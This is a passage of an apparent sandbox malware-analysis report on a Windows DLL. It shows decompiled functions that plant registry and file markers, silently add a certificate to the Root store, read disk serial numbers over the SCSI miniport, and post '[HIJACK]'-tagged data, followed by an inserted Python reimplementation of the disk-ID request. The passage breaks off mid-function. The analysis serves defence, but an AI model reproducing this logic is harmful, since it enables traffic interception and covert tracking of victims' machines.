• Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			/* Decompiler output as reported; analyst comments added. Registers and
			 * temporaries (_t77, _t95.._t101) are decompiler artifacts, not source variables. */
			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;   /* result flag: 1 only if every check below succeeds */
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);   /* zero-fill the path buffer (memset-like helper) */
				/* CSIDL 0x1a = CSIDL_APPDATA: build "%APPDATA%\Microsoft\Windows\win_a.dat" */
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				/* second artifact path under the same folder, named with a hex-looking token */
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);   /* fills _v268 with a further registry path */
				/* 0x80000002 = HKEY_LOCAL_MACHINE; each E1001F680 call operates on one registry key,
				 * each E1001F5F0 call on one file path, and the chain short-circuits on the first failure */
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;   /* all file and HKLM registry operations succeeded */
									}
								}
							}
						}
					}
				}
				return _v536;
			}
APIs
• _memset.LIBCMT ref: 1001FA58
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
• _strcat_s.LIBCMT ref: 1001FA84
• _memset.LIBCMT ref: 1001FAA1
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
• _strcat_s.LIBCMT ref: 1001FACD
• _memset.LIBCMT ref: 1001FAEA
  • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
  • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
  • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
  • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
  • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
  • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
  • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
  • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
  • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
Strings
• \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
• \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
• SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
• SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
• SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
• SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
• String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
• API String ID: 475603772-4188859120
• Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
• Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
• Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
• Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
                                                                                                                                                				char _v8;
                                                                                                                                                				char _v12;
                                                                                                                                                				char* _v16;
                                                                                                                                                				char* _v20;
                                                                                                                                                				char _v24;
                                                                                                                                                				char _v28;
                                                                                                                                                				char _v32;
                                                                                                                                                				char _v35;
                                                                                                                                                				char _v39;
                                                                                                                                                				char _v43;
                                                                                                                                                				char _v44;
                                                                                                                                                				void* _t86;
                                                                                                                                                				void* _t88;
                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                				void* _t92;
                                                                                                                                                				void* _t120;
                                                                                                                                                				void* _t140;
                                                                                                                                                				void* _t141;
                                                                                                                                                				void* _t191;
                                                                                                                                                				void* _t192;
                                                                                                                                                				void* _t193;
                                                                                                                                                				void* _t194;
                                                                                                                                                				void* _t195;
                                                                                                                                                				void* _t196;
                                                                                                                                                
                                                                                                                                                				_t192 = __esi;
                                                                                                                                                				_t191 = __edi;
                                                                                                                                                				_t141 = __ebx;
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_v20 = "https://";
                                                                                                                                                				_v16 = "http://";
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v28 = 0;
                                                                                                                                                				_v24 = 0;
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v43 = 0;
                                                                                                                                                				_v39 = 0;
                                                                                                                                                				_v35 = 0;
                                                                                                                                                				_t86 = E10001A50(_a4, _v20);
                                                                                                                                                				_t194 = _t193 + 8;
                                                                                                                                                				if(_t86 != 0) {
                                                                                                                                                					L2:
                                                                                                                                                					_v8 = _a4;
                                                                                                                                                					_t88 = E10001A50(_a4, _v20);
                                                                                                                                                					_t195 = _t194 + 8;
                                                                                                                                                					if(_t88 == 0) {
                                                                                                                                                						 *_a8 = 0;
                                                                                                                                                						_v8 = _v8 + 7;
                                                                                                                                                						 *_a20 = 0x50;
                                                                                                                                                					} else {
                                                                                                                                                						 *_a8 = 1;
                                                                                                                                                						_v8 = _v8 + 8;
                                                                                                                                                						 *_a20 = 0x1bb;
                                                                                                                                                					}
                                                                                                                                                					_t91 = E10001A50(_v8, "/");
                                                                                                                                                					_t196 = _t195 + 8;
                                                                                                                                                					_v28 = _t91;
                                                                                                                                                					if(_v28 == 0) {
                                                                                                                                                						_t92 = E1000CAC0(_v8);
                                                                                                                                                						_t196 = _t196 + 4;
                                                                                                                                                						_v24 = _t92 + 1;
                                                                                                                                                					} else {
                                                                                                                                                						_v24 = _v28 - _v8 + 1;
                                                                                                                                                					}
                                                                                                                                                					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                					E1000CF20(_t191,  *_a12, 0, _v24);
                                                                                                                                                					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
                                                                                                                                                					_v28 = E10001A50(_v8, "/");
                                                                                                                                                					if(_v28 == 0) {
                                                                                                                                                						_v24 = 2;
                                                                                                                                                						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
                                                                                                                                                						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                						E1000E280( *_a24, "/");
                                                                                                                                                					} else {
                                                                                                                                                						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
                                                                                                                                                						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
                                                                                                                                                						E1000CF20(_t191,  *_a24, 0, _v24);
                                                                                                                                                						E1000E280( *_a24, _v28);
                                                                                                                                                					}
                                                                                                                                                					_v8 = E10001A50( *_a12, ":");
                                                                                                                                                					if(_v8 == 0) {
                                                                                                                                                						_t181 = _a12;
                                                                                                                                                						_v24 = E1000CAC0( *_a12) + 1;
                                                                                                                                                					} else {
                                                                                                                                                						_v24 = _v8 -  *_a12 + 1;
                                                                                                                                                						_t120 = E1000CAC0( *_a12);
                                                                                                                                                						_t181 =  &_v44;
                                                                                                                                                						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
                                                                                                                                                						E1000E5E5( &_v44, "%d", _a20);
                                                                                                                                                					}
                                                                                                                                                					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
                                                                                                                                                					E1000CF20(_t191,  *_a16, 0, _v24);
                                                                                                                                                					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
                                                                                                                                                					_v32 = 1;
                                                                                                                                                				} else {
                                                                                                                                                					_t140 = E10001A50(_a4, _v16);
                                                                                                                                                					_t194 = _t194 + 8;
                                                                                                                                                					if(_t140 != 0) {
                                                                                                                                                						goto L2;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return _v32;
                                                                                                                                                			}

Instruction addresses (the report's address column for the listing above, in listing order):
0x100211b0 0x100211b0 0x100211b0 0x100211b6 0x100211bd 0x100211c4 0x100211cb 0x100211d2
0x100211d9 0x100211e0 0x100211e7 0x100211ed 0x100211f0 0x100211f3 0x100211fe 0x10021203
0x10021208 0x10021222 0x10021225 0x10021230 0x10021235 0x1002123a 0x1002125c 0x10021268
0x1002126e 0x1002123c 0x1002123f 0x1002124b 0x10021251 0x10021251 0x1002127d 0x10021282
0x10021285 0x1002128c 0x100212a0 0x100212a5 0x100212ab 0x1002128e 0x10021297 0x10021297
0x100212bd 0x100212cb 0x100212e4 0x100212fd 0x10021304 0x10021359 0x1002136f 0x1002137d
0x10021390 0x10021306 0x1002131d 0x1002132f 0x1002133d 0x1002134f 0x10021354 0x100213ab
0x100213b2 0x100213fe 0x1002140f 0x100213b4 0x100213bf 0x100213c8 0x100213db 0x100213df
0x100213f4 0x100213f9 0x10021421 0x1002142f 0x1002144a 0x10021452 0x1002120a 0x10021212
0x10021217 0x1002121c 0x00000000 0x00000000 0x1002121c 0x1002145f

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3056589307-0
                                                                                                                                                • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

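Added example (not part of the Joe Sandbox report and not the sample's own code). The routine E1001D560 listed under the next C-Code heading opens \\.\Scsi%d:, then for drive numbers 0 and 1 sends DeviceIoControl code 0x4d008 (IOCTL_SCSI_MINIPORT) with an SRB_IO_CONTROL header whose signature is "SCSIDISK" (0x49534353, 0x4b534944) and whose control code is 0x1b0501 (IOCTL_SCSI_MINIPORT_IDENTIFY), wrapping an ATA IDENTIFY DEVICE command (0xec). That is the textbook way to read a physical disk's model and serial number through the miniport, and a disk serial is a common hardware-ID input for stealer families. The Python below rebuilds the 0x3c-byte request from the constants in the listing, applies the same acceptance test the sample uses (the byte at buffer offset 98, _v1010, must be non-zero) and decodes the 256-word IDENTIFY sector that the 0x100-iteration copy loop collects. Assumptions: structure field names and offsets come from the Windows SDK (SRB_IO_CONTROL in ntddscsi.h, SENDCMDINPARAMS/SENDCMDOUTPARAMS in winioctl.h) and the ATA IDENTIFY word map (serial words 10-19, firmware 23-26, model 27-46); the page does not show E1001CD70, so extracting the serial number is an assumption about what that helper returns; the response buffer is constructed, not captured from the sample, and nothing here talks to a real device.

```python
"""Rebuild and decode the IOCTL_SCSI_MINIPORT / ATA IDENTIFY exchange seen in E1001D560.

Added example: layouts follow the Windows SDK (ntddscsi.h, winioctl.h) and the
ATA IDENTIFY DEVICE word map; the response used below is constructed, not captured.
"""
import struct
from typing import Dict, Optional, Sequence

# Constants exactly as they appear in the decompiled listing of E1001D560.
IOCTL_SCSI_MINIPORT = 0x0004D008           # DeviceIoControl code
IOCTL_SCSI_MINIPORT_IDENTIFY = 0x001B0501  # SRB_IO_CONTROL.ControlCode  (_v1092)
SRB_IO_CONTROL_LEN = 0x1C                  # SRB_IO_CONTROL.HeaderLength (_v1108)
SRB_SIGNATURE = b"SCSIDISK"                # _v1104 = 0x49534353, _v1100 = 0x4B534944
SRB_TIMEOUT = 0x2710                       # SRB_IO_CONTROL.Timeout      (_v1096)
SENDIDLENGTH = 0x211                       # SRB_IO_CONTROL.Length       (_v1084)
IN_BUFFER_LEN = 0x3C                       # nInBufferSize in the DeviceIoControl call
OUT_BUFFER_LEN = 0x22D                     # nOutBufferSize and memset length
ATA_IDENTIFY_DEVICE = 0xEC                 # IDEREGS.bCommandReg         (_v1070)

# SDK layout (assumption from the headers, not from the page): SENDCMDOUTPARAMS follows the
# 28-byte SRB_IO_CONTROL and its bBuffer, the 512-byte IDENTIFY sector, starts 16 bytes in
# (cBufferSize + DRIVERSTATUS).
IDENTIFY_OFFSET = SRB_IO_CONTROL_LEN + 16
# Word 27 is the first word of the model string; byte 98 is the `_v1010` the sample tests.
MODEL_CHECK_OFFSET = IDENTIFY_OFFSET + 27 * 2


def build_identify_request(drive_number: int) -> bytes:
    """Return the 0x3C-byte input buffer E1001D560 hands to DeviceIoControl."""
    header = struct.pack(
        "<I8sIIII",
        SRB_IO_CONTROL_LEN,            # HeaderLength
        SRB_SIGNATURE,                 # Signature
        SRB_TIMEOUT,                   # Timeout
        IOCTL_SCSI_MINIPORT_IDENTIFY,  # ControlCode
        0,                             # ReturnCode
        SENDIDLENGTH,                  # Length
    )
    # SENDCMDINPARAMS: cBufferSize, IDEREGS[8], bDriveNumber, bReserved[3], dwReserved[4].
    # IDEREGS index 6 is bCommandReg; the sample leaves every other register zero.
    ideregs = bytes([0, 0, 0, 0, 0, 0, ATA_IDENTIFY_DEVICE, 0])
    params = struct.pack("<I8sB3s4I", 0, ideregs, drive_number, b"\0" * 3, 0, 0, 0, 0)
    request = header + params
    assert len(request) == IN_BUFFER_LEN
    return request


def _ata_string(words: Sequence[int]) -> str:
    """ATA stores text with the two bytes of every little-endian 16-bit word swapped."""
    raw = b"".join(bytes([w >> 8, w & 0xFF]) for w in words)
    return raw.decode("ascii", errors="replace").strip()


def parse_identify_response(buf: bytes) -> Optional[Dict[str, str]]:
    """Apply the sample's acceptance test, then decode the IDENTIFY strings."""
    if len(buf) < OUT_BUFFER_LEN or buf[MODEL_CHECK_OFFSET] == 0:
        return None  # `_v1010 == 0`: no model text, the sample moves to the next drive
    sector = buf[IDENTIFY_OFFSET:IDENTIFY_OFFSET + 512]
    words = struct.unpack("<256H", sector)  # the 256-entry DWORD copy loop over _v16
    return {
        "serial": _ata_string(words[10:20]),     # assumption about what E1001CD70 extracts
        "firmware": _ata_string(words[23:27]),
        "model": _ata_string(words[27:47]),
    }


def _encode_ata_string(text: str, nwords: int) -> bytes:
    """Inverse of _ata_string; used only to build the constructed sample response."""
    padded = text.encode("ascii")[:nwords * 2].ljust(nwords * 2)
    return b"".join(struct.pack("<H", (padded[i] << 8) | padded[i + 1])
                    for i in range(0, len(padded), 2))


def constructed_response(model: str, serial: str, firmware: str) -> bytes:
    """A synthetic 0x22D-byte output buffer (constructed, not captured from the sample)."""
    sector = bytearray(512)
    sector[20:40] = _encode_ata_string(serial, 10)    # words 10-19
    sector[46:54] = _encode_ata_string(firmware, 4)   # words 23-26
    sector[54:94] = _encode_ata_string(model, 20)     # words 27-46
    buf = bytearray(OUT_BUFFER_LEN)
    buf[:SRB_IO_CONTROL_LEN] = build_identify_request(0)[:SRB_IO_CONTROL_LEN]
    buf[IDENTIFY_OFFSET:IDENTIFY_OFFSET + 512] = sector
    return bytes(buf)


if __name__ == "__main__":
    print(build_identify_request(1).hex())
    reply = constructed_response("CONSTRUCTED DISK MODEL", "SN-CONSTRUCTED-01", "1.00")
    print(parse_identify_response(reply))
    print(parse_identify_response(bytes(OUT_BUFFER_LEN)))  # all-zero reply: rejected
```

Against a live host the output of build_identify_request() would be passed as lpInBuffer to DeviceIoControl with a 0x22d-byte output buffer, which is exactly the call shape in the listing; the parser then reads the reply the same way the sample's copy loop does.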
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E1001D560(void* __edi, char* _a4) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				struct _OVERLAPPED* _v12;
                                                                                                                                                				signed int _v16;
                                                                                                                                                				struct _OVERLAPPED* _v20;
                                                                                                                                                				struct _OVERLAPPED* _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				void* _v32;
                                                                                                                                                				short _v548;
                                                                                                                                                				char _v1010;
                                                                                                                                                				char _v1068;
                                                                                                                                                				char _v1070;
                                                                                                                                                				intOrPtr _v1084;
                                                                                                                                                				intOrPtr _v1092;
                                                                                                                                                				intOrPtr _v1096;
                                                                                                                                                				intOrPtr _v1100;
                                                                                                                                                				intOrPtr _v1104;
                                                                                                                                                				void _v1108;
                                                                                                                                                				char _v2132;
                                                                                                                                                				struct _OVERLAPPED* _v2136;
                                                                                                                                                				char _v2137;
                                                                                                                                                				long _v2144;
                                                                                                                                                				struct _OVERLAPPED* _v2148;
                                                                                                                                                				intOrPtr _v2152;
                                                                                                                                                				char* _v2156;
                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                				intOrPtr _t96;
                                                                                                                                                				void* _t125;
                                                                                                                                                				void* _t126;
                                                                                                                                                				void* _t127;
                                                                                                                                                
                                                                                                                                                				_t125 = __edi;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_v2136 = 0;
                                                                                                                                                				_v24 = 0;
                                                                                                                                                				do {
                                                                                                                                                					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
                                                                                                                                                					_t127 = _t127 + 0xc;
                                                                                                                                                					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                					if(_v32 != 0xffffffff) {
                                                                                                                                                						_v12 = 0;
                                                                                                                                                						while(1 != 0) {
                                                                                                                                                							E1000CF20(_t125,  &_v1108, 0, 0x22d);
                                                                                                                                                							_t127 = _t127 + 0xc;
                                                                                                                                                							_v1104 = 0x49534353;
                                                                                                                                                							_v1100 = 0x4b534944;
                                                                                                                                                							_v1068 = _v12;
                                                                                                                                                							_v1108 = 0x1c;
                                                                                                                                                							_v1096 = 0x2710;
                                                                                                                                                							_v1084 = 0x211;
                                                                                                                                                							_v1092 = 0x1b0501;
                                                                                                                                                							_v1070 = 0xec;
                                                                                                                                                							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
                                                                                                                                                								L20:
                                                                                                                                                								if(_v2136 != 0) {
                                                                                                                                                									L23:
                                                                                                                                                								} else {
                                                                                                                                                									_v12 =  &(_v12->Internal);
                                                                                                                                                									if(_v12 < 2) {
                                                                                                                                                										goto L23;
                                                                                                                                                									} else {
                                                                                                                                                										continue;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								_v16 = 0;
                                                                                                                                                								do {
                                                                                                                                                									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
                                                                                                                                                									_v16 = _v16 + 1;
                                                                                                                                                								} while (_v16 < 0x100);
                                                                                                                                                								_t91 = E1001CD70( &_v2132);
                                                                                                                                                								_t127 = _t127 + 4;
                                                                                                                                                								_v28 = _t91;
                                                                                                                                                								_v2148 = 0;
                                                                                                                                                								_v8 = 0x104;
                                                                                                                                                								_v2156 = _a4;
                                                                                                                                                								_v2152 = _v28 - _a4;
                                                                                                                                                								while(_v8 != 0x80000106) {
                                                                                                                                                									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
                                                                                                                                                									if(_v2137 != 0) {
                                                                                                                                                										 *_v2156 = _v2137;
                                                                                                                                                										_v2156 = _v2156 + 1;
                                                                                                                                                										_t96 = _v8 - 1;
                                                                                                                                                										_v8 = _t96;
                                                                                                                                                										if(_t96 != 0) {
                                                                                                                                                											continue;
                                                                                                                                                										} else {
                                                                                                                                                											L17:
                                                                                                                                                											_v2156 = _v2156 - 1;
                                                                                                                                                											_v2148 = 0x8007007a;
                                                                                                                                                										}
                                                                                                                                                									} else {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									L18:
                                                                                                                                                									 *_v2156 = 0;
                                                                                                                                                									if(_v2148 < 0) {
                                                                                                                                                										goto L20;
                                                                                                                                                									} else {
                                                                                                                                                										goto L24;
                                                                                                                                                									}
                                                                                                                                                									goto L25;
                                                                                                                                                								}
                                                                                                                                                								if(_v8 == 0) {
                                                                                                                                                									goto L17;
                                                                                                                                                								} else {
                                                                                                                                                								}
                                                                                                                                                								goto L18;
                                                                                                                                                							}
                                                                                                                                                							L25:
                                                                                                                                                							CloseHandle(_v32);
                                                                                                                                                							_v20 = _v24;
                                                                                                                                                							goto L26;
                                                                                                                                                						}
                                                                                                                                                						L24:
                                                                                                                                                						_v2136 = 1;
                                                                                                                                                						goto L25;
                                                                                                                                                					}
                                                                                                                                                					L26:
                                                                                                                                                					_v20 =  &(_v20->Internal);
                                                                                                                                                					_v24 = _v20;
                                                                                                                                                				} while (_v20 < 0x10);
                                                                                                                                                				return _v2136;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001D660
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001D7A2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                • API String ID: 3873020565-153650326
                                                                                                                                                • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                				char _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				char _v44;
                                                                                                                                                				char _v72;
                                                                                                                                                				char _v100;
                                                                                                                                                				char _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char _v160;
                                                                                                                                                				char _v188;
                                                                                                                                                				signed int _v192;
                                                                                                                                                				intOrPtr _v196;
                                                                                                                                                				intOrPtr _v200;
                                                                                                                                                				intOrPtr _v204;
                                                                                                                                                				intOrPtr _v208;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t75;
                                                                                                                                                				void* _t76;
                                                                                                                                                				intOrPtr _t119;
                                                                                                                                                				void* _t127;
                                                                                                                                                
                                                                                                                                                				_t127 = __eflags;
                                                                                                                                                				_t118 = __esi;
                                                                                                                                                				_t117 = __edi;
                                                                                                                                                				_t87 = __ebx;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(E10022C17);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t119;
                                                                                                                                                				_v192 = 0;
                                                                                                                                                				_push(_a12);
                                                                                                                                                				_push(0x30);
                                                                                                                                                				_push("post_info");
                                                                                                                                                				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
                                                                                                                                                				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v196 = E10001160( &_v160, _t127, _a8);
                                                                                                                                                				_v200 = _v196;
                                                                                                                                                				_v8 = 1;
                                                                                                                                                				E10001A70( &_v128, _v200);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				E100011A0( &_v160);
                                                                                                                                                				E10001160( &_v100, _t127, "info=");
                                                                                                                                                				_v8 = 2;
                                                                                                                                                				_v204 = E10001160( &_v188, _t127, _v132);
                                                                                                                                                				_v208 = _v204;
                                                                                                                                                				_v8 = 3;
                                                                                                                                                				E10001A70( &_v100, _v208);
                                                                                                                                                				_v8 = 2;
                                                                                                                                                				E100011A0( &_v188);
                                                                                                                                                				_push(E100011E0( &_v128));
                                                                                                                                                				_push(0x3d);
                                                                                                                                                				_push("post_info");
                                                                                                                                                				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
                                                                                                                                                				E10001160( &_v44, _t127, 0x10024ca2);
                                                                                                                                                				_v8 = 4;
                                                                                                                                                				E10001160( &_v72, _t127, 0x10024ca3);
                                                                                                                                                				_v8 = 5;
                                                                                                                                                				_t75 = E10001200( &_v100);
                                                                                                                                                				_t76 = E100011E0( &_v100);
                                                                                                                                                				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
                                                                                                                                                				_push(_v132);
                                                                                                                                                				E1000CA30(_t87, _t117, _t118, _t127);
                                                                                                                                                				E10001110(_a4, _t127,  &_v72);
                                                                                                                                                				_v192 = _v192 | 0x00000001;
                                                                                                                                                				_v8 = 4;
